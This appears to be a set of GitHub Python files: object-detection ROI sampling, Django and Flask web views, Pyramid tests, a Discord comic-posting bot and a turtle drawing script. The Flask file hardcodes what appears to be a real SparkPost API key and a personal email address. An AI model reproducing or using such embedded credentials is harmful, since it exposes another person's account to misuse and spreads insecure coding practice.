> 0)[0] \r\n for ind in inds:\r\n cls = clss[ind]\r\n start = int(4 * cls)\r\n end = start + 4\r\n bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]\r\n bbox_inside_weights[ind, start:end] = cfg.roi_input_inside_weight\r\n return bbox_targets,bbox_inside_weights\r\n \r\ndef _sample_rois(all_rois, all_scores, gt_boxes, fg_rois_per_image, rois_per_image, num_classes, gt_cls): \r\n \"\"\" rois sample process: clip to the image boundary, nms, bg_fg sample\"\"\"\r\n overlaps = calculate_IOU(all_rois[:, 1:5], gt_boxes)\r\n gt_assignment = overlaps.argmax(axis=1)\r\n max_overlaps = overlaps.max(axis=1)\r\n labels = gt_cls[gt_assignment]\r\n fg_inds = np.where(max_overlaps >= cfg.fg_thresh)[0]\r\n bg_inds = np.where((max_overlaps < cfg.bg_thresh_hi) &(max_overlaps >= cfg.bg_thresh_lo))[0]\r\n #print(np.sum(fg_inds), np.sum(bg_inds))\r\n if fg_inds.size > 0 and bg_inds.size > 0: \r\n fg_rois_per_image = min(fg_rois_per_image, fg_inds.size) \r\n fg_inds = npr.choice(fg_inds, size=int(fg_rois_per_image), replace=False) \r\n bg_rois_per_image = rois_per_image - fg_rois_per_image \r\n to_replace = bg_inds.size < bg_rois_per_image\r\n bg_inds = npr.choice(bg_inds, size=int(bg_rois_per_image), replace=to_replace) \r\n elif fg_inds.size > 0:\r\n to_replace = fg_inds.size < rois_per_image\r\n fg_inds = npr.choice(fg_inds, size=int(rois_per_image), replace=to_replace)\r\n fg_rois_per_image = rois_per_image\r\n elif bg_inds.size > 0:\r\n to_replace = bg_inds.size < rois_per_image\r\n bg_inds = npr.choice(bg_inds, size=int(rois_per_image), replace=to_replace)\r\n fg_rois_per_image = 0\r\n else:\r\n import pdb\r\n pdb.set_trace()\r\n keep_inds = np.append(fg_inds, bg_inds)\r\n labels = labels[keep_inds] \r\n labels[int(fg_rois_per_image):] = 0\r\n rois = all_rois[keep_inds]\r\n roi_scores = all_scores[keep_inds]\r\n \r\n \r\n bbox_target_data = _compute_targets(rois[:, 1:5], gt_boxes[gt_assignment[keep_inds], :], labels)\r\n \r\n \r\n bbox_targets, bbox_inside_weights = _get_bbox_regression_labels(bbox_target_data, num_classes)\r\n return labels, rois, roi_scores, bbox_targets, bbox_inside_weights\r\n\r\ndef _compute_targets(ex_rois, gt_rois, labels):\r\n \"\"\"Compute bounding-box regression targets for an image.\"\"\"\r\n\r\n assert ex_rois.shape[0] == gt_rois.shape[0]\r\n assert ex_rois.shape[1] == 4\r\n assert gt_rois.shape[1] == 4\r\n\r\n targets = bbox_transform(ex_rois, gt_rois) \r\n if cfg.bbox_nor_target_pre:\r\n \r\n targets = ((targets - np.array(cfg.bbox_nor_mean))/np.array(cfg.bbox_nor_stdv)) \r\n return np.hstack((labels[:, np.newaxis], targets)).astype(np.float32, copy=False)\r\n \r\ndef bbox_transform(ex_rois, gt_rois):\r\n \"\"\" convert the coordinate of gt_rois into targets form using ex_rois \"\"\"\r\n ex_widths = ex_rois[:, 2] - ex_rois[:, 0] + 1.0\r\n ex_heights = ex_rois[:, 3] - ex_rois[:, 1] + 1.0\r\n ex_ctr_x = ex_rois[:, 0] + 0.5 * ex_widths\r\n ex_ctr_y = ex_rois[:, 1] + 0.5 * ex_heights\r\n\r\n gt_widths = gt_rois[:, 2] - gt_rois[:, 0] + 1.0\r\n gt_heights = gt_rois[:, 3] - gt_rois[:, 1] + 1.0\r\n gt_ctr_x = gt_rois[:, 0] + 0.5 * gt_widths\r\n gt_ctr_y = gt_rois[:, 1] + 0.5 * gt_heights\r\n\r\n targets_dx = (gt_ctr_x - ex_ctr_x) / ex_widths \r\n targets_dy = (gt_ctr_y - ex_ctr_y) / ex_heights \r\n targets_dw = np.log(gt_widths / ex_widths)\r\n targets_dh = np.log(gt_heights / ex_heights)\r\n\r\n targets = np.vstack(\r\n (targets_dx, targets_dy, targets_dw, targets_dh)).transpose()\r\n return targets\r\n 
\r\n","repo_name":"LongJun123456/Faster-rcnn-tensorflow","sub_path":"rois_target.py","file_name":"rois_target.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"29461206878","text":"from django.views.generic import TemplateView\nfrom isoweek import Week # noqa\nimport pandas # noqa\nfrom routine.models import WorkoutDailyRoutine # noqa\nfrom .models import Workout\nfrom django.db.models import Q\nfrom core.libs.global_functions import calc_min_or_hour # noqa\nfrom dal import autocomplete # noqa\nfrom django.db.models import Q # noqa\n\n\ndef get_or_create_routine(date):\n \"\"\"Returns an existing object or creates a new one if not\n\n Args:\n\n date (date): date\n\n Returns:\n\n object: WorkoutDailyRoutine object\n \"\"\"\n obj, created = WorkoutDailyRoutine.objects.get_or_create(date=date)\n if created:\n return created\n return obj\n\n\ndef get_weekly_routines(start_date, end_date):\n \"\"\"Returns a list of routines between two dates\n\n Args:\n\n start date (date): start date of routines\n end date (date): end date of routines\n\n Returns:\n\n list: filtered list of WorkoutDailyRoutine objects\n \"\"\"\n for day in pandas.date_range(start_date, end_date):\n get_or_create_routine(day)\n return WorkoutDailyRoutine.objects.filter(\n Q(date__gte=start_date) &\n Q(date__lte=end_date)).order_by('date')\n\n\ndef get_min_weekly_workouts(routines, filter_to=None):\n \"\"\"Return the amount of minutes/hours per given routines (for a week)\n in total or filtered by done or not done\n\n Args:\n\n routines (list): list of WorkoutDailyRoutine objs\n filter to (boolean, optional): workoutplan filter that can be True\n or False. Defaults to None.\n\n Returns:\n\n int: minutes\n str: time (hour:h or minutes:m)\n \"\"\"\n minutes = 0\n for routine in routines:\n if filter_to or filter_to is not None:\n for plan in routine.workoutplan_set.filter(done=filter_to):\n minutes += plan.workout.time_in_min\n else:\n for plan in routine.workoutplan_set.all():\n minutes += plan.workout.time_in_min\n return minutes\n\n\ndef get_nr_of_routines(routines, filter_to=None):\n \"\"\"Returns the number of workouts in set of given routines\n\n Args:\n\n routines (list): list of WorkoutDailyRoutine objects\n filter to (boolean, optional): workoutplan filter that can be True\n or False. Defaults to None.\n\n Returns:\n\n int: number of routines\n \"\"\"\n nr = 0\n for routine in routines:\n if filter_to or filter_to is not None:\n for plan in routine.workoutplan_set.filter(done=filter_to):\n nr += 1\n else:\n for plan in routine.workoutplan_set.all():\n nr += 1\n return nr\n\n\ndef get_diff_min_to_prev_week(min_current, min_previous):\n \"\"\"Calculates the difference in percentage from current week:day compared\n to a previous week:day\n\n Args:\n\n min current (float): sum of minutes of current period of time\n min previous (float): sum of minutes of previous period of time\n\n Returns:\n\n int: difference in %\n \"\"\"\n increase = min_current - min_previous\n try:\n return round(increase / min_previous * 100, 2)\n except Exception:\n if min_current > 0:\n return 100\n return 0\n\n\nclass WorkoutView(TemplateView):\n template_name = 'workout/workout.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n # ! 
IMPORTANT\n        \"\"\"get week_nr from url\"\"\"\n        _selected_week = self.kwargs['week_nr']\n        _selected_year = self.kwargs['week_year']\n        _week = Week(_selected_year, _selected_week)\n        _previous_week = Week(_selected_year, _selected_week-1)\n        weeknumber = _week.week\n        routines = get_weekly_routines(_week.monday(), _week.sunday())\n        _routines_prev_week = get_weekly_routines(_previous_week.monday(),\n                                                  _previous_week.sunday())\n\n        _min_workouts = get_min_weekly_workouts(routines)\n        _min_workouts_done = get_min_weekly_workouts(routines, True)\n        _min_workouts_todo = get_min_weekly_workouts(routines, False)\n\n        _min_workouts_prev_week = get_min_weekly_workouts(\n            _routines_prev_week)\n\n        context['selected_week'] = weeknumber\n        context['selected_year'] = _selected_year\n        context['weekly_routines'] = routines\n\n        context['tot_h'] = calc_min_or_hour(_min_workouts)\n        context['tot_h_done'] = calc_min_or_hour(_min_workouts_done)\n        context['tot_h_to_todo'] = calc_min_or_hour(_min_workouts_todo)\n        context['nr_workouts'] = get_nr_of_routines(routines)\n        context['nr_workouts_done'] = get_nr_of_routines(routines, True)\n        context['nr_workouts_todo'] = get_nr_of_routines(routines, False)\n        context['diff_to_prev_week'] = get_diff_min_to_prev_week(\n            _min_workouts, _min_workouts_prev_week)\n\n        return context\n\n\nclass WorkoutAutocomplete(autocomplete.Select2QuerySetView):\n    def get_queryset(self):\n        qs = Workout.objects.all()\n\n        if self.q:\n            qs = qs.filter(\n                Q(types__name__icontains=self.q) |\n                Q(name__icontains=self.q)\n            )\n\n        return qs\n","repo_name":"Licceeee/learning-material-django","sub_path":"project/workout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5272917803","text":"from flask import Flask\nfrom flask import json\nfrom flask import request\nfrom flask_cors import CORS, cross_origin\nfrom sparkpost import SparkPost\nimport helper\nimport algo\nimport redis  # needed by the /api/subscribe route below\n\napp = Flask(__name__)\nCORS(app)\n\n# app.run(host='127.0.0.1', port=8000)\n\n@app.route('/')\ndef helloWorld():\n    return \"helloWorld\"\n\n@app.route('/test/')\ndef test():\n    code = int(request.args[\"gender\"])\n\n    if code == 1:\n        return \"Female\"\n    elif code == 2:\n        return \"Male\"\n    elif code == 3:\n        return \"Nonbinary\"\n    elif code == 4:\n        return \"Other\"\n    else:\n        return \"Prefer not to say\"\n\n@app.route(\"/api/getSale/\")\ndef getSale():\n    ageMin = request.args[\"ageMin\"]\n    ageMax = request.args[\"ageMax\"]\n    gender = request.args[\"gender\"]\n    ethnicity = request.args[\"ethnicity\"]\n    efficiency = request.args[\"efficiency\"]\n    coverage = request.args[\"coverage\"]\n    discount = request.args[\"discount\"]\n    zipcode = request.args[\"zipcode\"]\n    if efficiency == \"true\":\n        return getEfficientSale(ageMin, ageMax, gender, ethnicity, coverage, zipcode, discount)\n    else:\n        return algo.getRegSale(ageMin, ageMax, gender, ethnicity, coverage, zipcode, discount)\n    return 'Hello'\n\n@app.route(\"/api/changePrice\", methods=['POST'])\ndef changePrice():\n    item = request.form[\"item\"]\n    price = request.form[\"price\"]\n    iData = helper.getItemDataFromFirebasez()\n    if iData[item][\"price\"] > price:\n        iData[item][\"price\"] = price\n        name = iData[item][\"name\"]\n        #PUSH ITEM DATA HERE\n        sp = SparkPost(\"a6280abfffa83de5381bb5d87cfc6eb9f4fab70e\")\n        response = sp.transmissions.send(\n            use_sandbox=False,\n            recipients=['vincentwsong@gmail.com'],\n            html='
    Your item, ' + name + ' is now on sale!
    ',\n            from_email='nordstrom@vwsong.com',\n            subject='Hello from Nordstrom/SparkPost!'\n        )\n        return \"item price updated, emails sent out!\"\n\n    return \"item price updated!\"\n\n@app.route(\"/api/addSimulationData\", methods=[\"GET\"])\ndef addSimulationData():\n    output = algo.simulationData()\n    return output + \" added\"\n\n@app.route(\"/api/subscribe\", methods=['POST'])\ndef redisAddCustomerData():\n    r = redis.StrictRedis(host=\"127.0.0.1\", port=6379, db=0)\n    s = request.get_json(silent=True)\n    print(s)\n    customerID = s['customerID']\n    age = s['age']\n    gender = s['gender']\n    ethnicity = s['ethnicity']\n    zipcode = s['zipcode']\n    print(\"ayo1\")\n    # phone = s['phone']\n    # email = s['email']\n    savedItemIDs = s['savedItemIDs']\n    print(savedItemIDs)\n    r.hset(customerID,\"age\", age)\n    r.hset(customerID,\"gender\", gender)\n    r.hset(customerID,\"ethnicity\", ethnicity)\n    r.hset(customerID,\"zipcode\", zipcode)\n    print(\"ayo2\")\n    # r.hset(customerID,\"phone\", phone)\n    # r.hset(customerID, \"email\", email)\n    r.hset(customerID,\"gender\", gender)\n    print(\"ayo3\")\n    for x in savedItemIDs:\n        r.sadd('interestList-'+ str(x), customerID)\n    return 'Hello'\n","repo_name":"vwsong/smartsales","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23863591153","text":"import pytest\nfrom pyramid import testing\n\nENTRIES = {\n    1: {\"id\": 1, \"title\": \"Today, Dec. 16, I learned.\", \"creation_date\": \"12/16/2016\", \"body\": \"Sample text\"},\n    2: {\"id\": 2, \"title\": \"Today, Dec. 17, I learned.\", \"creation_date\": \"12/17/2016\", \"body\": \"Sample text\"},\n    3: {\"id\": 3, \"title\": \"Today, Dec. 18, I learned.\", \"creation_date\": \"12/18/2016\", \"body\": \"Sample text\"},\n    4: {\"id\": 4, \"title\": \"Today, Dec. 19, I learned.\", \"creation_date\": \"12/19/2016\", \"body\": \"Sample text\"},\n    5: {\"id\": 5, \"title\": \"Today, Dec. 
20, I learned.\", \"creation_date\": \"12/20/2016\", \"body\": \"Sample text\"},\n}\n\n\n@pytest.fixture\ndef req():\n \"\"\"Dummy request fixture.\"\"\"\n return testing.DummyRequest()\n\n\ndef test_homepage_renders_file_data(req):\n \"\"\"Ensure my homepage view returns some data.\"\"\"\n from .views import homepage\n response = homepage(req)\n assert \"ENTRIES\" in response\n\n\ndef test_homepage_page_has_iterable(req):\n \"\"\"Ensure my homepage view returns some iterable data.\"\"\"\n from .views import homepage\n response = homepage(req)\n assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\n# def test_edit_page_renders_file_data(req):\n# \"\"\"Ensure my edit-post page view returns some data.\"\"\"\n# from .views import edit\n# response = edit(req)\n# assert \"ENTRIES\" in response\n\n\n# def test_update_page_has_iterable(req):\n# \"\"\"Ensure my edit-post page view returns some iterable data.\"\"\"\n# from .views import edit\n# response = edit(req)\n# assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\ndef test_write_page_renders_file_data(req):\n \"\"\"Ensure my write-new-post page returns some data.\"\"\"\n from .views import write\n response = write(req)\n assert \"ENTRIES\" in response\n\n\ndef test_write_page_has_iterable(req):\n \"\"\"Ensure my create page view returns some iterable data.\"\"\"\n from .views import write\n response = write(req)\n assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\n# def test_detail_page_renders_file_data(req):\n# \"\"\"Ensure my home page view returns some data.\"\"\"\n# from .views import detail\n# response = detail(req)\n# assert \"ENTRIES\" in response\n\n\n# def test_detail_page_has_iterable(req):\n# \"\"\"Ensure my jinja2 page view returns some iterable data.\"\"\"\n# from .views import detail\n# response = detail(req)\n# assert hasattr([\"ENTRIES\"], \"__iter__\")\n\n\n@pytest.fixture\ndef testapp():\n \"\"\"Test App fixture.\"\"\"\n from webtest import TestApp\n from learning_journal_basic import main\n app = main({})\n return TestApp(app)\n\n\ndef test_index_page_exists(testapp):\n \"\"\"Homepage should exist.\"\"\"\n response = testapp.get(\"/\", status=200)\n html = response.html\n assert \"An index of entries.\" in html.find('header').text\n\n\ndef test_detail_page_exists(testapp):\n \"\"\"Detail page should exist.\"\"\"\n response = testapp.get(\"/journal/1\", status=200)\n html = response.html\n assert \"The what and the how of the day.\" in html.find('header').text\n\n\ndef test_edit_form_page_exists(testapp):\n \"\"\"Edit page should exist.\"\"\"\n response = testapp.get(\"/journal/3/editentry\", status=200)\n html = response.html\n assert \"Make amends. Add, correct, extend.\" in html.find('header').text\n\n\ndef test_write_page_exists(testapp):\n \"\"\"New Form page should exist.\"\"\"\n response = testapp.get(\"/journal/write\", status=200)\n html = response.html\n assert \"Reflect, record. 
What got learned?\" in html.find('header').text\n","repo_name":"rveeblefetzer/learning-journal-basic","sub_path":"learning_journal_basic/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14423662918","text":"from datetime import datetime, timedelta, timezone\nfrom typing import Iterable, Optional\n\nimport discord\nfrom discord import app_commands\nfrom discord.ext import commands, tasks\n\nfrom bdbot.discord_utils import (\n SERVER,\n NextSend,\n clean_database,\n create_embed,\n is_owner,\n logger,\n run_blocking,\n send_chan_embed,\n send_mention,\n send_message,\n)\nfrom bdbot.utils import (\n COMIC_LATEST_LINKS_PATH,\n DATABASE_FILE_PATH,\n Action,\n Date,\n date_to_db,\n get_hour,\n get_last_corresponding_date,\n get_today,\n link_cache,\n load_json,\n parse_all,\n restore_backup,\n save_backup,\n save_json,\n strip_details,\n)\nfrom bdbot.Web_requests_manager import get_new_comic_details\n\n\nclass PosterHandler(commands.Cog):\n \"\"\"\n Manages automatic posting of hourly comic strips\n \"\"\"\n\n def __init__(self, bot: discord.Client):\n \"\"\"\n Construct the cog.\n\n :param bot: The discord bot\n \"\"\"\n self.bot: discord.Client = bot\n self.do_cleanup: bool = True\n\n # @app_commands.command(hidden=True, guilds=SERVER)\n # @app_commands.is_owner()\n async def start_hourly(self, inter: discord.Interaction):\n \"\"\"Starts the PosterHandler loop\"\"\"\n await send_message(\n inter, \"Hourly loop started! Hourly comics are posted at each hour.\"\n )\n\n await PosterHandler.wait_for_next_hour(self)\n\n async def wait_for_next_hour(self):\n \"\"\"Wait for the time to restart the hourly loop\"\"\"\n sleep_date = datetime.now(timezone.utc).replace(\n minute=0, second=0, microsecond=0\n ) + timedelta(hours=1)\n await discord.utils.sleep_until(sleep_date)\n await PosterHandler.post_hourly.start(self)\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @commands.is_owner()\n async def force_hourly(\n self, inter: discord.Interaction, hour: Optional[int] = None\n ):\n \"\"\"Force the push of comics to all subscribed servers\n\n\n :param inter: The context of the where the command was called.\n :param hour: The hour to simulate\n \"\"\"\n await inter.response.send_message(\n f\"Trying to force the hourly post for hour {get_hour() if not hour else hour}h UTC\"\n )\n await self.hourly(hour)\n\n @tasks.loop(hours=1)\n async def post_hourly(self):\n \"\"\"Loop to post hourly comics\"\"\"\n try:\n await self.hourly()\n except Exception as e:\n logger.error(str(e))\n\n async def hourly(self, hour: Optional[int] = None):\n \"\"\"Post hourly comics\"\"\"\n logger.info(\"Starting automatic poster...\")\n comic_data: dict = load_json(DATABASE_FILE_PATH)\n comic_list: dict = {}\n comic_keys: list[str] = list(strip_details.keys())\n post_days = [Date.Daily, get_today()]\n\n if not hour:\n hour = get_hour()\n hour = str(hour)\n\n if hour == \"6\":\n save_backup(comic_data, logger)\n\n if self.do_cleanup:\n clean_database(data=comic_data, logger_=logger)\n\n # Construct the list of what comics need to be sent\n logger.info(\"Constructing guild info....\")\n for guild in comic_data:\n guild_data = comic_data[guild]\n await run_blocking(\n self.get_comic_info_for_guild,\n self.bot,\n guild_data,\n comic_list,\n post_days,\n hour,\n )\n\n logger.info(\"Sending comics....\")\n await self.check_comics_and_post(comic_list, strip_details, comic_keys)\n\n 
save_json(link_cache, COMIC_LATEST_LINKS_PATH) # Saves the link cache\n\n logger.info(\"Finished automatic poster.\")\n\n def get_comic_info_for_guild(\n self, guild_data: dict, comic_list: dict, post_days: Iterable[Date], hour: str\n ):\n \"\"\"Get the comic info for each server. This method mutate 'comic_list' for each comic.\n\n :param guild_data: All the information of the server\n :param comic_list: The information about where to post each comic and how\n :param post_days: The days to check for\n :param hour: The current hour\n \"\"\"\n if \"channels\" in guild_data:\n for channel in guild_data[\"channels\"]:\n\n # First check if it wants only the latest comics\n if \"latest\" in guild_data[\"channels\"][channel]:\n latest_comics: list[int] = guild_data[\"channels\"][channel][\"latest\"]\n comic_list: dict = self.set_comic_to_post(\n guild_data, channel, comic_list, latest_comics, hour, True\n )\n\n # Then check if the comic is wanted for a specific time\n for day in post_days:\n str_date = date_to_db(day)\n if \"date\" in guild_data[\"channels\"][channel]:\n if str_date in guild_data[\"channels\"][channel][\"date\"]:\n if (\n hour\n in guild_data[\"channels\"][channel][\"date\"][str_date]\n ):\n hour_specific_comics: list[int] = guild_data[\n \"channels\"\n ][channel][\"date\"][str_date][hour]\n comic_list: dict = self.set_comic_to_post(\n guild_data,\n channel,\n comic_list,\n hour_specific_comics,\n hour,\n )\n\n def set_comic_to_post(\n self,\n guild_data: dict,\n channel: str,\n comic_list: dict,\n comics_to_add: list[int],\n hour: str,\n latest: bool = False,\n ) -> dict:\n \"\"\"Set one comic to post on one channel\n\n :param guild_data: All the information of the server\n :param channel: The string of the ID of the channel to post the comics\n :param comic_list: The information about where to post each comic and how\n :param comics_to_add: The comic number to check for\n :param hour: The current hour\n :param latest: If to add latest comics\n \"\"\"\n if channel not in comic_list:\n # Assure no duplicates\n to_mention = guild_data[\"mention\"]\n role: Optional[discord.Role] = None\n\n if (\n (\"only_daily\" in guild_data)\n and (not guild_data[\"only_daily\"] or hour == \"6\")\n and (\"role\" in guild_data)\n and to_mention\n ):\n # Check if:\n # - A role is set\n # - The role can be mentioned anytime, or it is 6 AM UTC\n # - And the guild wants to be mentioned\n role = discord.Guild.get_role(\n self.bot.get_guild(guild_data[\"server_id\"]), guild_data[\"role\"]\n )\n\n comic_list.update(\n {\n channel: {\n \"channel\": channel,\n \"comics\": comics_to_add if not latest else [],\n \"latest_comics\": comics_to_add if latest else [],\n \"role\": role,\n \"hasBeenMentioned\": False,\n \"wantMention\": to_mention,\n }\n }\n )\n else:\n comic_list[channel][\"comics\" if not latest else \"latest_comics\"].extend(\n comics_to_add\n )\n\n return comic_list\n\n async def check_comics_and_post(\n self,\n comic_list: dict,\n comic_details: dict,\n comic_keys: list[str],\n called_channel: Optional[discord.TextChannel] = None,\n post_time: datetime = datetime.now(timezone.utc),\n ):\n \"\"\"Load comics and check if they are the latest ones.\n Finally, post the comic to the channels.\n\n :param comic_list: The information about where to post each comic and how\n :param comic_details: The details of the comic strip\n :param comic_keys: The name of all the comics\n :param called_channel: The channel of where the command was sent from (Should be None for the hourly poster\n and filled when 
called manually)\n :param post_time: The post time\n \"\"\"\n available_channels = {}\n not_available_channels = {}\n nb_of_comics_posted = 0\n # Check if any guild want the comic\n for i in range(len(comic_details)):\n count = 0\n for chan in comic_list:\n if (\n i in comic_list[chan][\"comics\"]\n or i in comic_list[chan][\"latest_comics\"]\n ):\n count += 1\n break\n\n if count > 0:\n # Get the details of the comic\n comic_details: Optional[dict]\n try:\n comic_details = await run_blocking(\n get_new_comic_details,\n self.bot,\n strip_details[comic_keys[i]],\n Action.Today,\n latest_check=True,\n )\n except Exception as e:\n # Anything can happen (connection problem, etc... and the bot will crash if any error\n # is raised in the poster loop)\n logger.error(f\"An error occurred while getting a comic: {e}\")\n comic_details = None\n\n embed = create_embed(comic_details) # Creates the embed\n\n is_latest: bool\n if comic_details is not None:\n is_latest = comic_details[\"is_latest\"]\n else:\n is_latest = False\n\n if is_latest and called_channel is None:\n # Only updates the link cache if it is done during the hourly loop\n link_cache[comic_details[\"Name\"]] = comic_details[\"img_url\"]\n\n for channel in comic_list:\n # Finally, sends the comic\n nb_of_comics_posted += await self.load_channel_and_send(\n i,\n comic_list,\n channel,\n embed,\n is_latest,\n available_channels,\n not_available_channels,\n called_channel,\n post_time,\n )\n if called_channel is None:\n # Only logs the hourly loop at the end\n logger.info(\n f\"The hourly loop sent {nb_of_comics_posted} comic(s) the \"\n f\"{datetime.now().strftime('%dth of %B %Y at %Hh')}\"\n )\n if called_channel is not None and nb_of_comics_posted == 0:\n # If it was called manually ('post' command), and there is no comics to post anywhere in the guild,\n # it will warn in the channel that no comics needed to be sent, and it will conclude\n await called_channel.send(\"No comics to send!\")\n\n async def load_channel_and_send(\n self,\n comic_number: int,\n comic_list: dict,\n channel: str,\n embed: discord.Embed,\n is_latest: bool,\n available_channels: dict,\n not_available_channels: dict,\n called_channel: Optional[discord.TextChannel] = None,\n post_time: datetime = datetime.now(timezone.utc),\n ) -> int:\n \"\"\"Sends the loaded comic to the specified channel\n\n :param comic_number: The number of the comic to send\n :param comic_list: The information about where to post each comic and how\n :param channel: The channel where to send the comic to\n :param embed: The embed with the comic\n :param is_latest: If the comic is the latest one\n :param available_channels: The dictionary of available channels\n :param not_available_channels: The dictionary of not-available channels\n :param called_channel: The channel of the where the command was called (None in the hourly loop,\n filled when called through /post).\n :param post_time: The post time\n\n :returns: 1 if it posted a comic, 0 if it could/did not\n \"\"\"\n latest_comics = comic_list[channel][\"latest_comics\"]\n this_hour_comics = comic_list[channel][\"comics\"]\n\n # Check if the comic is wanted\n if not (comic_number in this_hour_comics or comic_number in latest_comics):\n return 0\n\n # Check if the comic is the latest and if it even cares about the latest comic\n if (\n comic_number not in this_hour_comics\n and comic_number in latest_comics\n and not is_latest\n ):\n return 0\n\n # Then, gets the channel object by its ID\n channel_id = 
int(comic_list[channel][\"channel\"])\n\n if channel_id not in available_channels:\n # Retrieves the channel object by the discord client\n chan = self.bot.get_channel(channel_id)\n # And save it for future use (so it can be looked up later)\n available_channels.update({channel_id: chan})\n else:\n # Use the cached channel object\n chan = available_channels.get(channel_id)\n\n if (\n chan is not None\n and channel_id not in not_available_channels\n and chan.permissions_for(\n chan.guild.get_member(self.bot.user.id)\n ).send_messages\n ):\n # Makes sure that the channel is available (e.g. channel object is not None and the bot\n # can send messages)\n try:\n await send_mention(chan, channel, comic_list, post_time)\n\n # Sends the comic embed (most important)\n await send_chan_embed(chan, embed)\n return 1\n except Exception as e:\n # There is too many things that can go wrong here, just catch everything\n error_msg = f\"An error occurred in the hourly poster: {e.__class__.__name__}: {e}\"\n logger.error(error_msg)\n\n if called_channel is not None:\n # Send the error message to the channel too\n await called_channel.send(error_msg)\n else:\n # Remembers that the channel is not available\n not_available_channels.update({channel_id: None})\n if called_channel is not None:\n # If it can, send a message to the channel if an error occurred\n if chan is None:\n chan = comic_list[channel][\"channel\"]\n else:\n chan = chan.mention\n\n await called_channel.send(f\"Could not send message to channel {chan}\")\n else:\n # Logs that a channel is not available but still signed up for a comic\n logger.warning(\n f\"A comic could not be posted to a channel. Channel id: {channel_id}\"\n )\n # If it encountered an issue or there is no comic to send, return 0\n return 0\n\n @app_commands.command()\n @app_commands.checks.has_permissions(manage_guild=True)\n @app_commands.guild_only()\n async def post(\n self, inter: discord.Interaction, date: Date = None, hour: int = None\n ):\n \"\"\"Force the comic post for a single server.\n\n :param inter: The interaction of the where the command was called.\n :param date: The date to simulate\n :param hour: The hour to simulate\n \"\"\"\n comic_data: dict = load_json(DATABASE_FILE_PATH)\n comic_list: dict = {}\n comic_keys: list[str] = list(strip_details.keys())\n guild_id: str = str(inter.guild.id)\n\n if guild_id in comic_data:\n # Gets date and hour of force post\n final_date, final_hour = parse_all(\n date,\n hour,\n default_date=get_today(),\n default_hour=get_hour(),\n )\n await send_message(\n inter,\n f\"Looking for comics to post for date: {final_date.value} at \"\n f\"{final_hour}h UTC\",\n )\n post_days = (Date.Daily, final_date)\n final_hour = str(final_hour)\n post_time = get_last_corresponding_date(final_date, final_hour)\n\n # Gets the comic info for the guild\n await run_blocking(\n self.get_comic_info_for_guild,\n self.bot,\n comic_data[guild_id],\n comic_list,\n post_days,\n final_hour,\n )\n # If there is comic to send\n if len(comic_list) > 0:\n await self.check_comics_and_post(\n comic_list,\n strip_details,\n comic_keys,\n called_channel=inter.channel,\n post_time=post_time,\n )\n else:\n await send_message(\n inter, \"No comics to send!\", next_send=NextSend.Followup\n )\n else:\n # Warns that no comic are available\n await send_message(inter, \"This server is not subscribed to any comic!\")\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @app_commands.checks.check(is_owner)\n async def update_database_clean(self, inter: 
discord.Interaction):\n \"\"\"Clean the database from servers that don't have any comics saved\n\n :param inter: The context of the where the command was called.\n \"\"\"\n nb_removed = clean_database(bot=self.bot, strict=True, logger_=logger)\n\n await send_message(\n inter, f\"Cleaned the database from {nb_removed} inactive server(s).\"\n )\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @commands.is_owner()\n async def restore_last_backup(self, inter: discord.Interaction):\n \"\"\"Restore a previous backup\n\n :param inter: The context of the where the command was called.\n \"\"\"\n # Stops the database cleaning and restore the last backup\n self.do_cleanup = False\n restore_backup()\n\n await send_message(\n inter,\n \"Last backup restored! Please reboot the bot to re-enable automatic cleanups!\",\n )\n\n @app_commands.command()\n @app_commands.guilds(SERVER.id)\n @commands.is_owner()\n async def do_backup(self, inter: discord.Interaction):\n \"\"\"Force a backup\n\n :param inter: The context of the where the command was called.\n \"\"\"\n # Force a backup\n save_backup(load_json(DATABASE_FILE_PATH), logger)\n await send_message(inter, \"Backup done!\")\n\n\nasync def setup(bot: commands.Bot):\n \"\"\"Initialize the cog\n\n :param bot: The discord Bot\n \"\"\"\n await bot.add_cog(PosterHandler(bot))\n","repo_name":"BBArikL/BDBot","sub_path":"bdbot/cogs/AutomaticPoster.py","file_name":"AutomaticPoster.py","file_ext":"py","file_size_in_byte":19253,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"17439927686","text":"#Aula 6 exercicio 6 apostila + funções extra!\n#Fazer 4 estrelas.\nimport turtle\njn=turtle.Screen()\njn.title(\"4 stars!!!\")\njn.bgcolor(\"MidnightBlue\")\n\nstar=turtle.Turtle()\nstar.color(\"white\")\nstar.shape(\"turtle\")\nstar.speed(0)\nstar.pensize(2)\nstar.hideturtle() #essa função faz a Turtle ficar \"invisivel\".\n\n#Podemos criar uma função para desenhar estrelas\n\ndef drawing_stars():\n star.pendown() #essa função coloca a caneta no papel\n star.begin_fill() #essa função pinta formas fechadas\n for n in range(5): \n star.left(144)\n star.forward(100)\n star.end_fill()\n star.penup() #Essa função levanta a caneta do papel. Assim podemos mudar a posição da tartaruga entre estrelas sem marcar com linhas o caminho.\n\n#Agora é só definir a posição das estrelas\n\nfor i in range(4):\n drawing_stars()\n star.left(90)\n star.forward(300)\n","repo_name":"jvictor42/PyUERJ-first-steps","sub_path":"Exercicios apostila e exemplos/Aula6.6A.py","file_name":"Aula6.6A.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74150564649","text":"import sys\r\nread = sys.stdin.readline\r\n\r\nn = 